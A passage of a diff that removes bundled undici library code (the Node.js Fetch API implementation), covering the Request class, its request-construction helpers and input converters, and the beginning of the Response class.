kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) - -let TransformStream = globalThis.TransformStream - -const kAbortController = Symbol('abortController') - -const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { - signal.removeEventListener('abort', abort) -}) - -// https://fetch.spec.whatwg.org/#request-class -class Request { - // https://fetch.spec.whatwg.org/#dom-request - constructor (input, init = {}) { - if (input === kConstruct) { - return - } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) - - input = webidl.converters.RequestInfo(input) - init = webidl.converters.RequestInit(init) - - // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object - this[kRealm] = { - settingsObject: { - baseUrl: getGlobalOrigin(), - get origin () { - return this.baseUrl?.origin - }, - policyContainer: makePolicyContainer() - } - } - - // 1. Let request be null. - let request = null - - // 2. Let fallbackMode be null. - let fallbackMode = null - - // 3. Let baseURL be this’s relevant settings object’s API base URL. - const baseUrl = this[kRealm].settingsObject.baseUrl - - // 4. Let signal be null. - let signal = null - - // 5. If input is a string, then: - if (typeof input === 'string') { - // 1. Let parsedURL be the result of parsing input with baseURL. - // 2. If parsedURL is failure, then throw a TypeError. - let parsedURL - try { - parsedURL = new URL(input, baseUrl) - } catch (err) { - throw new TypeError('Failed to parse URL from ' + input, { cause: err }) - } - - // 3. If parsedURL includes credentials, then throw a TypeError. - if (parsedURL.username || parsedURL.password) { - throw new TypeError( - 'Request cannot be constructed from a URL that includes credentials: ' + - input - ) - } - - // 4. Set request to a new request whose URL is parsedURL. - request = makeRequest({ urlList: [parsedURL] }) - - // 5. Set fallbackMode to "cors". - fallbackMode = 'cors' - } else { - // 6. Otherwise: - - // 7. Assert: input is a Request object. - assert(input instanceof Request) - - // 8. Set request to input’s request. - request = input[kState] - - // 9. Set signal to input’s signal. - signal = input[kSignal] - } - - // 7. Let origin be this’s relevant settings object’s origin. - const origin = this[kRealm].settingsObject.origin - - // 8. Let window be "client". - let window = 'client' - - // 9. If request’s window is an environment settings object and its origin - // is same origin with origin, then set window to request’s window. - if ( - request.window?.constructor?.name === 'EnvironmentSettingsObject' && - sameOrigin(request.window, origin) - ) { - window = request.window - } - - // 10. If init["window"] exists and is non-null, then throw a TypeError. - if (init.window != null) { - throw new TypeError(`'window' option '${window}' must be null`) - } - - // 11. If init["window"] exists, then set window to "no-window". - if ('window' in init) { - window = 'no-window' - } - - // 12. Set request to a new request with the following properties: - request = makeRequest({ - // URL request’s URL. - // undici implementation note: this is set as the first item in request's urlList in makeRequest - // method request’s method. - method: request.method, - // header list A copy of request’s header list. - // undici implementation note: headersList is cloned in makeRequest - headersList: request.headersList, - // unsafe-request flag Set. - unsafeRequest: request.unsafeRequest, - // client This’s relevant settings object. - client: this[kRealm].settingsObject, - // window window. - window, - // priority request’s priority. - priority: request.priority, - // origin request’s origin. The propagation of the origin is only significant for navigation requests - // being handled by a service worker. In this scenario a request can have an origin that is different - // from the current client. - origin: request.origin, - // referrer request’s referrer. - referrer: request.referrer, - // referrer policy request’s referrer policy. - referrerPolicy: request.referrerPolicy, - // mode request’s mode. - mode: request.mode, - // credentials mode request’s credentials mode. - credentials: request.credentials, - // cache mode request’s cache mode. - cache: request.cache, - // redirect mode request’s redirect mode. - redirect: request.redirect, - // integrity metadata request’s integrity metadata. - integrity: request.integrity, - // keepalive request’s keepalive. - keepalive: request.keepalive, - // reload-navigation flag request’s reload-navigation flag. - reloadNavigation: request.reloadNavigation, - // history-navigation flag request’s history-navigation flag. - historyNavigation: request.historyNavigation, - // URL list A clone of request’s URL list. - urlList: [...request.urlList] - }) - - const initHasKey = Object.keys(init).length !== 0 - - // 13. If init is not empty, then: - if (initHasKey) { - // 1. If request’s mode is "navigate", then set it to "same-origin". - if (request.mode === 'navigate') { - request.mode = 'same-origin' - } - - // 2. Unset request’s reload-navigation flag. - request.reloadNavigation = false - - // 3. Unset request’s history-navigation flag. - request.historyNavigation = false - - // 4. Set request’s origin to "client". - request.origin = 'client' - - // 5. Set request’s referrer to "client" - request.referrer = 'client' - - // 6. Set request’s referrer policy to the empty string. - request.referrerPolicy = '' - - // 7. Set request’s URL to request’s current URL. - request.url = request.urlList[request.urlList.length - 1] - - // 8. Set request’s URL list to « request’s URL ». - request.urlList = [request.url] - } - - // 14. If init["referrer"] exists, then: - if (init.referrer !== undefined) { - // 1. Let referrer be init["referrer"]. - const referrer = init.referrer - - // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". - if (referrer === '') { - request.referrer = 'no-referrer' - } else { - // 1. Let parsedReferrer be the result of parsing referrer with - // baseURL. - // 2. If parsedReferrer is failure, then throw a TypeError. - let parsedReferrer - try { - parsedReferrer = new URL(referrer, baseUrl) - } catch (err) { - throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) - } - - // 3. If one of the following is true - // - parsedReferrer’s scheme is "about" and path is the string "client" - // - parsedReferrer’s origin is not same origin with origin - // then set request’s referrer to "client". - if ( - (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || - (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) - ) { - request.referrer = 'client' - } else { - // 4. Otherwise, set request’s referrer to parsedReferrer. - request.referrer = parsedReferrer - } - } - } - - // 15. If init["referrerPolicy"] exists, then set request’s referrer policy - // to it. - if (init.referrerPolicy !== undefined) { - request.referrerPolicy = init.referrerPolicy - } - - // 16. Let mode be init["mode"] if it exists, and fallbackMode otherwise. - let mode - if (init.mode !== undefined) { - mode = init.mode - } else { - mode = fallbackMode - } - - // 17. If mode is "navigate", then throw a TypeError. - if (mode === 'navigate') { - throw webidl.errors.exception({ - header: 'Request constructor', - message: 'invalid request mode navigate.' - }) - } - - // 18. If mode is non-null, set request’s mode to mode. - if (mode != null) { - request.mode = mode - } - - // 19. If init["credentials"] exists, then set request’s credentials mode - // to it. - if (init.credentials !== undefined) { - request.credentials = init.credentials - } - - // 18. If init["cache"] exists, then set request’s cache mode to it. - if (init.cache !== undefined) { - request.cache = init.cache - } - - // 21. If request’s cache mode is "only-if-cached" and request’s mode is - // not "same-origin", then throw a TypeError. - if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { - throw new TypeError( - "'only-if-cached' can be set only with 'same-origin' mode" - ) - } - - // 22. If init["redirect"] exists, then set request’s redirect mode to it. - if (init.redirect !== undefined) { - request.redirect = init.redirect - } - - // 23. If init["integrity"] exists, then set request’s integrity metadata to it. - if (init.integrity != null) { - request.integrity = String(init.integrity) - } - - // 24. If init["keepalive"] exists, then set request’s keepalive to it. - if (init.keepalive !== undefined) { - request.keepalive = Boolean(init.keepalive) - } - - // 25. If init["method"] exists, then: - if (init.method !== undefined) { - // 1. Let method be init["method"]. - let method = init.method - - // 2. If method is not a method or method is a forbidden method, then - // throw a TypeError. - if (!isValidHTTPToken(method)) { - throw new TypeError(`'${method}' is not a valid HTTP method.`) - } - - if (forbiddenMethodsSet.has(method.toUpperCase())) { - throw new TypeError(`'${method}' HTTP method is unsupported.`) - } - - // 3. Normalize method. - method = normalizeMethodRecord[method] ?? normalizeMethod(method) - - // 4. Set request’s method to method. - request.method = method - } - - // 26. If init["signal"] exists, then set signal to it. - if (init.signal !== undefined) { - signal = init.signal - } - - // 27. Set this’s request to request. - this[kState] = request - - // 28. Set this’s signal to a new AbortSignal object with this’s relevant - // Realm. - // TODO: could this be simplified with AbortSignal.any - // (https://dom.spec.whatwg.org/#dom-abortsignal-any) - const ac = new AbortController() - this[kSignal] = ac.signal - this[kSignal][kRealm] = this[kRealm] - - // 29. If signal is not null, then make this’s signal follow signal. - if (signal != null) { - if ( - !signal || - typeof signal.aborted !== 'boolean' || - typeof signal.addEventListener !== 'function' - ) { - throw new TypeError( - "Failed to construct 'Request': member signal is not of type AbortSignal." - ) - } - - if (signal.aborted) { - ac.abort(signal.reason) - } else { - // Keep a strong ref to ac while request object - // is alive. This is needed to prevent AbortController - // from being prematurely garbage collected. - // See, https://github.com/nodejs/undici/issues/1926. - this[kAbortController] = ac - - const acRef = new WeakRef(ac) - const abort = function () { - const ac = acRef.deref() - if (ac !== undefined) { - ac.abort(this.reason) - } - } - - // Third-party AbortControllers may not work with these. - // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. - try { - // If the max amount of listeners is equal to the default, increase it - // This is only available in node >= v19.9.0 - if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { - setMaxListeners(100, signal) - } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { - setMaxListeners(100, signal) - } - } catch {} - - util.addAbortListener(signal, abort) - requestFinalizer.register(ac, { signal, abort }) - } - } - - // 30. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is request’s header list and guard is - // "request". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kHeadersList] = request.headersList - this[kHeaders][kGuard] = 'request' - this[kHeaders][kRealm] = this[kRealm] - - // 31. If this’s request’s mode is "no-cors", then: - if (mode === 'no-cors') { - // 1. If this’s request’s method is not a CORS-safelisted method, - // then throw a TypeError. - if (!corsSafeListedMethodsSet.has(request.method)) { - throw new TypeError( - `'${request.method} is unsupported in no-cors mode.` - ) - } - - // 2. Set this’s headers’s guard to "request-no-cors". - this[kHeaders][kGuard] = 'request-no-cors' - } - - // 32. If init is not empty, then: - if (initHasKey) { - /** @type {HeadersList} */ - const headersList = this[kHeaders][kHeadersList] - // 1. Let headers be a copy of this’s headers and its associated header - // list. - // 2. If init["headers"] exists, then set headers to init["headers"]. - const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) - - // 3. Empty this’s headers’s header list. - headersList.clear() - - // 4. If headers is a Headers object, then for each header in its header - // list, append header’s name/header’s value to this’s headers. - if (headers instanceof HeadersList) { - for (const [key, val] of headers) { - headersList.append(key, val) - } - // Note: Copy the `set-cookie` meta-data. - headersList.cookies = headers.cookies - } else { - // 5. Otherwise, fill this’s headers with headers. - fillHeaders(this[kHeaders], headers) - } - } - - // 33. Let inputBody be input’s request’s body if input is a Request - // object; otherwise null. - const inputBody = input instanceof Request ? input[kState].body : null - - // 34. If either init["body"] exists and is non-null or inputBody is - // non-null, and request’s method is `GET` or `HEAD`, then throw a - // TypeError. - if ( - (init.body != null || inputBody != null) && - (request.method === 'GET' || request.method === 'HEAD') - ) { - throw new TypeError('Request with GET/HEAD method cannot have body.') - } - - // 35. Let initBody be null. - let initBody = null - - // 36. If init["body"] exists and is non-null, then: - if (init.body != null) { - // 1. Let Content-Type be null. - // 2. Set initBody and Content-Type to the result of extracting - // init["body"], with keepalive set to request’s keepalive. - const [extractedBody, contentType] = extractBody( - init.body, - request.keepalive - ) - initBody = extractedBody - - // 3, If Content-Type is non-null and this’s headers’s header list does - // not contain `Content-Type`, then append `Content-Type`/Content-Type to - // this’s headers. - if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { - this[kHeaders].append('content-type', contentType) - } - } - - // 37. Let inputOrInitBody be initBody if it is non-null; otherwise - // inputBody. - const inputOrInitBody = initBody ?? inputBody - - // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is - // null, then: - if (inputOrInitBody != null && inputOrInitBody.source == null) { - // 1. If initBody is non-null and init["duplex"] does not exist, - // then throw a TypeError. - if (initBody != null && init.duplex == null) { - throw new TypeError('RequestInit: duplex option is required when sending a body.') - } - - // 2. If this’s request’s mode is neither "same-origin" nor "cors", - // then throw a TypeError. - if (request.mode !== 'same-origin' && request.mode !== 'cors') { - throw new TypeError( - 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' - ) - } - - // 3. Set this’s request’s use-CORS-preflight flag. - request.useCORSPreflightFlag = true - } - - // 39. Let finalBody be inputOrInitBody. - let finalBody = inputOrInitBody - - // 40. If initBody is null and inputBody is non-null, then: - if (initBody == null && inputBody != null) { - // 1. If input is unusable, then throw a TypeError. - if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { - throw new TypeError( - 'Cannot construct a Request with a Request object that has already been used.' - ) - } - - // 2. Set finalBody to the result of creating a proxy for inputBody. - if (!TransformStream) { - TransformStream = (__nccwpck_require__(5356).TransformStream) - } - - // https://streams.spec.whatwg.org/#readablestream-create-a-proxy - const identityTransform = new TransformStream() - inputBody.stream.pipeThrough(identityTransform) - finalBody = { - source: inputBody.source, - length: inputBody.length, - stream: identityTransform.readable - } - } - - // 41. Set this’s request’s body to finalBody. - this[kState].body = finalBody - } - - // Returns request’s HTTP method, which is "GET" by default. - get method () { - webidl.brandCheck(this, Request) - - // The method getter steps are to return this’s request’s method. - return this[kState].method - } - - // Returns the URL of request as a string. - get url () { - webidl.brandCheck(this, Request) - - // The url getter steps are to return this’s request’s URL, serialized. - return URLSerializer(this[kState].url) - } - - // Returns a Headers object consisting of the headers associated with request. - // Note that headers added in the network layer by the user agent will not - // be accounted for in this object, e.g., the "Host" header. - get headers () { - webidl.brandCheck(this, Request) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - // Returns the kind of resource requested by request, e.g., "document" - // or "script". - get destination () { - webidl.brandCheck(this, Request) - - // The destination getter are to return this’s request’s destination. - return this[kState].destination - } - - // Returns the referrer of request. Its value can be a same-origin URL if - // explicitly set in init, the empty string to indicate no referrer, and - // "about:client" when defaulting to the global’s default. This is used - // during fetching to determine the value of the `Referer` header of the - // request being made. - get referrer () { - webidl.brandCheck(this, Request) - - // 1. If this’s request’s referrer is "no-referrer", then return the - // empty string. - if (this[kState].referrer === 'no-referrer') { - return '' - } - - // 2. If this’s request’s referrer is "client", then return - // "about:client". - if (this[kState].referrer === 'client') { - return 'about:client' - } - - // Return this’s request’s referrer, serialized. - return this[kState].referrer.toString() - } - - // Returns the referrer policy associated with request. - // This is used during fetching to compute the value of the request’s - // referrer. - get referrerPolicy () { - webidl.brandCheck(this, Request) - - // The referrerPolicy getter steps are to return this’s request’s referrer policy. - return this[kState].referrerPolicy - } - - // Returns the mode associated with request, which is a string indicating - // whether the request will use CORS, or will be restricted to same-origin - // URLs. - get mode () { - webidl.brandCheck(this, Request) - - // The mode getter steps are to return this’s request’s mode. - return this[kState].mode - } - - // Returns the credentials mode associated with request, - // which is a string indicating whether credentials will be sent with the - // request always, never, or only when sent to a same-origin URL. - get credentials () { - // The credentials getter steps are to return this’s request’s credentials mode. - return this[kState].credentials - } - - // Returns the cache mode associated with request, - // which is a string indicating how the request will - // interact with the browser’s cache when fetching. - get cache () { - webidl.brandCheck(this, Request) - - // The cache getter steps are to return this’s request’s cache mode. - return this[kState].cache - } - - // Returns the redirect mode associated with request, - // which is a string indicating how redirects for the - // request will be handled during fetching. A request - // will follow redirects by default. - get redirect () { - webidl.brandCheck(this, Request) - - // The redirect getter steps are to return this’s request’s redirect mode. - return this[kState].redirect - } - - // Returns request’s subresource integrity metadata, which is a - // cryptographic hash of the resource being fetched. Its value - // consists of multiple hashes separated by whitespace. [SRI] - get integrity () { - webidl.brandCheck(this, Request) - - // The integrity getter steps are to return this’s request’s integrity - // metadata. - return this[kState].integrity - } - - // Returns a boolean indicating whether or not request can outlive the - // global in which it was created. - get keepalive () { - webidl.brandCheck(this, Request) - - // The keepalive getter steps are to return this’s request’s keepalive. - return this[kState].keepalive - } - - // Returns a boolean indicating whether or not request is for a reload - // navigation. - get isReloadNavigation () { - webidl.brandCheck(this, Request) - - // The isReloadNavigation getter steps are to return true if this’s - // request’s reload-navigation flag is set; otherwise false. - return this[kState].reloadNavigation - } - - // Returns a boolean indicating whether or not request is for a history - // navigation (a.k.a. back-foward navigation). - get isHistoryNavigation () { - webidl.brandCheck(this, Request) - - // The isHistoryNavigation getter steps are to return true if this’s request’s - // history-navigation flag is set; otherwise false. - return this[kState].historyNavigation - } - - // Returns the signal associated with request, which is an AbortSignal - // object indicating whether or not request has been aborted, and its - // abort event handler. - get signal () { - webidl.brandCheck(this, Request) - - // The signal getter steps are to return this’s signal. - return this[kSignal] - } - - get body () { - webidl.brandCheck(this, Request) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Request) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - get duplex () { - webidl.brandCheck(this, Request) - - return 'half' - } - - // Returns a clone of request. - clone () { - webidl.brandCheck(this, Request) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || this.body?.locked) { - throw new TypeError('unusable') - } - - // 2. Let clonedRequest be the result of cloning this’s request. - const clonedRequest = cloneRequest(this[kState]) - - // 3. Let clonedRequestObject be the result of creating a Request object, - // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. - const clonedRequestObject = new Request(kConstruct) - clonedRequestObject[kState] = clonedRequest - clonedRequestObject[kRealm] = this[kRealm] - clonedRequestObject[kHeaders] = new Headers(kConstruct) - clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList - clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - // 4. Make clonedRequestObject’s signal follow this’s signal. - const ac = new AbortController() - if (this.signal.aborted) { - ac.abort(this.signal.reason) - } else { - util.addAbortListener( - this.signal, - () => { - ac.abort(this.signal.reason) - } - ) - } - clonedRequestObject[kSignal] = ac.signal - - // 4. Return clonedRequestObject. - return clonedRequestObject - } -} - -mixinBody(Request) - -function makeRequest (init) { - // https://fetch.spec.whatwg.org/#requests - const request = { - method: 'GET', - localURLsOnly: false, - unsafeRequest: false, - body: null, - client: null, - reservedClient: null, - replacesClientId: '', - window: 'client', - keepalive: false, - serviceWorkers: 'all', - initiator: '', - destination: '', - priority: null, - origin: 'client', - policyContainer: 'client', - referrer: 'client', - referrerPolicy: '', - mode: 'no-cors', - useCORSPreflightFlag: false, - credentials: 'same-origin', - useCredentials: false, - cache: 'default', - redirect: 'follow', - integrity: '', - cryptoGraphicsNonceMetadata: '', - parserMetadata: '', - reloadNavigation: false, - historyNavigation: false, - userActivation: false, - taintedOrigin: false, - redirectCount: 0, - responseTainting: 'basic', - preventNoCacheCacheControlHeaderModification: false, - done: false, - timingAllowFailed: false, - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList() - } - request.url = request.urlList[0] - return request -} - -// https://fetch.spec.whatwg.org/#concept-request-clone -function cloneRequest (request) { - // To clone a request request, run these steps: - - // 1. Let newRequest be a copy of request, except for its body. - const newRequest = makeRequest({ ...request, body: null }) - - // 2. If request’s body is non-null, set newRequest’s body to the - // result of cloning request’s body. - if (request.body != null) { - newRequest.body = cloneBody(request.body) - } - - // 3. Return newRequest. - return newRequest -} - -Object.defineProperties(Request.prototype, { - method: kEnumerableProperty, - url: kEnumerableProperty, - headers: kEnumerableProperty, - redirect: kEnumerableProperty, - clone: kEnumerableProperty, - signal: kEnumerableProperty, - duplex: kEnumerableProperty, - destination: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - isHistoryNavigation: kEnumerableProperty, - isReloadNavigation: kEnumerableProperty, - keepalive: kEnumerableProperty, - integrity: kEnumerableProperty, - cache: kEnumerableProperty, - credentials: kEnumerableProperty, - attribute: kEnumerableProperty, - referrerPolicy: kEnumerableProperty, - referrer: kEnumerableProperty, - mode: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Request', - configurable: true - } -}) - -webidl.converters.Request = webidl.interfaceConverter( - Request -) - -// https://fetch.spec.whatwg.org/#requestinfo -webidl.converters.RequestInfo = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (V instanceof Request) { - return webidl.converters.Request(V) - } - - return webidl.converters.USVString(V) -} - -webidl.converters.AbortSignal = webidl.interfaceConverter( - AbortSignal -) - -// https://fetch.spec.whatwg.org/#requestinit -webidl.converters.RequestInit = webidl.dictionaryConverter([ - { - key: 'method', - converter: webidl.converters.ByteString - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - }, - { - key: 'body', - converter: webidl.nullableConverter( - webidl.converters.BodyInit - ) - }, - { - key: 'referrer', - converter: webidl.converters.USVString - }, - { - key: 'referrerPolicy', - converter: webidl.converters.DOMString, - // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy - allowedValues: referrerPolicy - }, - { - key: 'mode', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#concept-request-mode - allowedValues: requestMode - }, - { - key: 'credentials', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcredentials - allowedValues: requestCredentials - }, - { - key: 'cache', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcache - allowedValues: requestCache - }, - { - key: 'redirect', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestredirect - allowedValues: requestRedirect - }, - { - key: 'integrity', - converter: webidl.converters.DOMString - }, - { - key: 'keepalive', - converter: webidl.converters.boolean - }, - { - key: 'signal', - converter: webidl.nullableConverter( - (signal) => webidl.converters.AbortSignal( - signal, - { strict: false } - ) - ) - }, - { - key: 'window', - converter: webidl.converters.any - }, - { - key: 'duplex', - converter: webidl.converters.DOMString, - allowedValues: requestDuplex - } -]) - -module.exports = { Request, makeRequest } - - -/***/ }), - -/***/ 7823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Headers, HeadersList, fill } = __nccwpck_require__(554) -const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) -const util = __nccwpck_require__(3983) -const { kEnumerableProperty } = util -const { - isValidReasonPhrase, - isCancelled, - isAborted, - isBlobLike, - serializeJavascriptValueToJSONString, - isErrorLike, - isomorphicEncode -} = __nccwpck_require__(2538) -const { - redirectStatusSet, - nullBodyStatus, - DOMException -} = __nccwpck_require__(1037) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { FormData } = __nccwpck_require__(2015) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { types } = __nccwpck_require__(3837) - -const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) -const textEncoder = new TextEncoder('utf-8') - -// https://fetch.spec.whatwg.org/#response-class -class Response { - // Creates network error Response. - static error () { - // TODO - const relevantRealm = { settingsObject: {} } - - // The static error() method steps are to return the result of creating a - // Response object, given a new network error, "immutable", and this’s - // relevant Realm. - const responseObject = new Response() - responseObject[kState] = makeNetworkError() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response-json - static json (data, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) - - if (init !== null) { - init = webidl.converters.ResponseInit(init) - } - - // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. - const bytes = textEncoder.encode( - serializeJavascriptValueToJSONString(data) - ) - - // 2. Let body be the result of extracting bytes. - const body = extractBody(bytes) - - // 3. Let responseObject be the result of creating a Response object, given a new response, - // "response", and this’s relevant Realm. - const relevantRealm = { settingsObject: {} } - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'response' - responseObject[kHeaders][kRealm] = relevantRealm - - // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). - initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) - - // 5. Return responseObject. - return responseObject - } - - // Creates a redirect Response that redirects to url with status status. - static redirect (url, status = 302) { - const relevantRealm = { settingsObject: {} } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) - - url = webidl.converters.USVString(url) - status = webidl.converters['unsigned short'](status) - - // 1. Let parsedURL be the result of parsing url with current settings - // object’s API base URL. - // 2. If parsedURL is failure, then throw a TypeError. - // TODO: base-URL? - let parsedURL - try { - parsedURL = new URL(url, getGlobalOrigin()) - } catch (err) { - throw Object.assign(new TypeError('Failed to parse URL from ' + url), { - cause: err - }) - } - - // 3. If status is not a redirect status, then throw a RangeError. - if (!redirectStatusSet.has(status)) { - throw new RangeError('Invalid status code ' + status) - } - - // 4. Let responseObject be the result of creating a Response object, - // given a new response, "immutable", and this’s relevant Realm. - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Set responseObject’s response’s status to status. - responseObject[kState].status = status - - // 6. Let value be parsedURL, serialized and isomorphic encoded. - const value = isomorphicEncode(URLSerializer(parsedURL)) - - // 7. Append `Location`/value to responseObject’s response’s header list. - responseObject[kState].headersList.append('location', value) - - // 8. Return responseObject. - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response - constructor (body = null, init = {}) { - if (body !== null) { - body = webidl.converters.BodyInit(body) - } - - init = webidl.converters.ResponseInit(init) - - // TODO - this[kRealm] = { settingsObject: {} } - - // 1. Set this’s response to a new response. - this[kState] = makeResponse({}) - - // 2. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is this’s response’s header list and guard - // is "response". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kGuard] = 'response' - this[kHeaders][kHeadersList] = this[kState].headersList - this[kHeaders][kRealm] = this[kRealm] - - // 3. Let bodyWithType be null. - let bodyWithType = null - - // 4. If body is non-null, then set bodyWithType to the result of extracting body. - if (body != null) { - const [extractedBody, type] = extractBody(body) - bodyWithType = { body: extractedBody, type } - } - - // 5. Perform initialize a response given this, init, and bodyWithType. - initializeResponse(this, init, bodyWithType) - } - - // Returns response’s type, e.g., "cors". - get type () { - webidl.brandCheck(this, Response) - - // The type getter steps are to return this’s response’s type. - return this[kState].type - } - - // Returns response’s URL, if it has one; otherwise the empty string. - get url () { - webidl.brandCheck(this, Response) - - const urlList = this[kState].urlList - - // The url getter steps are to return the empty string if this’s - // response’s URL is null; otherwise this’s response’s URL, - // serialized with exclude fragment set to true. - const url = urlList[urlList.length - 1] ?? null - - if (url === null) { - return '' - } - - return URLSerializer(url, true) - } - - // Returns whether response was obtained through a redirect. - get redirected () { - webidl.brandCheck(this, Response) - - // The redirected getter steps are to return true if this’s response’s URL - // list has more than one item; otherwise false. - return this[kState].urlList.length > 1 - } - - // Returns response’s status. - get status () { - webidl.brandCheck(this, Response) - - // The status getter steps are to return this’s response’s status. - return this[kState].status - } - - // Returns whether response’s status is an ok status. - get ok () { - webidl.brandCheck(this, Response) - - // The ok getter steps are to return true if this’s response’s status is an - // ok status; otherwise false. - return this[kState].status >= 200 && this[kState].status <= 299 - } - - // Returns response’s status message. - get statusText () { - webidl.brandCheck(this, Response) - - // The statusText getter steps are to return this’s response’s status - // message. - return this[kState].statusText - } - - // Returns response’s headers as Headers. - get headers () { - webidl.brandCheck(this, Response) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - get body () { - webidl.brandCheck(this, Response) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Response) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - // Returns a clone of response. - clone () { - webidl.brandCheck(this, Response) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || (this.body && this.body.locked)) { - throw webidl.errors.exception({ - header: 'Response.clone', - message: 'Body has already been consumed.' - }) - } - - // 2. Let clonedResponse be the result of cloning this’s response. - const clonedResponse = cloneResponse(this[kState]) - - // 3. Return the result of creating a Response object, given - // clonedResponse, this’s headers’s guard, and this’s relevant Realm. - const clonedResponseObject = new Response() - clonedResponseObject[kState] = clonedResponse - clonedResponseObject[kRealm] = this[kRealm] - clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList - clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - return clonedResponseObject - } -} - -mixinBody(Response) - -Object.defineProperties(Response.prototype, { - type: kEnumerableProperty, - url: kEnumerableProperty, - status: kEnumerableProperty, - ok: kEnumerableProperty, - redirected: kEnumerableProperty, - statusText: kEnumerableProperty, - headers: kEnumerableProperty, - clone: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Response', - configurable: true - } -}) - -Object.defineProperties(Response, { - json: kEnumerableProperty, - redirect: kEnumerableProperty, - error: kEnumerableProperty -}) - -// https://fetch.spec.whatwg.org/#concept-response-clone -function cloneResponse (response) { - // To clone a response response, run these steps: - - // 1. If response is a filtered response, then return a new identical - // filtered response whose internal response is a clone of response’s - // internal response. - if (response.internalResponse) { - return filterResponse( - cloneResponse(response.internalResponse), - response.type - ) - } - - // 2. Let newResponse be a copy of response, except for its body. - const newResponse = makeResponse({ ...response, body: null }) - - // 3. If response’s body is non-null, then set newResponse’s body to the - // result of cloning response’s body. - if (response.body != null) { - newResponse.body = cloneBody(response.body) - } - - // 4. Return newResponse. - return newResponse -} - -function makeResponse (init) { - return { - aborted: false, - rangeRequested: false, - timingAllowPassed: false, - requestIncludesCredentials: false, - type: 'default', - status: 200, - timingInfo: null, - cacheState: '', - statusText: '', - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList(), - urlList: init.urlList ? [...init.urlList] : [] - } -} - -function makeNetworkError (reason) { - const isError = isErrorLike(reason) - return makeResponse({ - type: 'error', - status: 0, - error: isError - ? reason - 